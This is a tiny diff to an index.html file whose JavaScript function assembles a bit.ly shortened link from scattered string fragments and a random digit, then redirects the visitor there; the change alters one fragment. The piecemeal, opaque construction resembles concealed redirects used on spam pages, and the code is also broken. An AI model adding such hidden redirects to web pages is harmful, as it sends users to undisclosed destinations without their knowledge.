--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 function reDirect() {
 a = location.href = "bit.ly/";
 b = location.href = "ma3a";
-c = location.href = "na";
+c = location.href = "naa";
 d = Math.ceil(Math.random() * 2);
 a = "http://" + a + b + c + d ;
 window.location = a
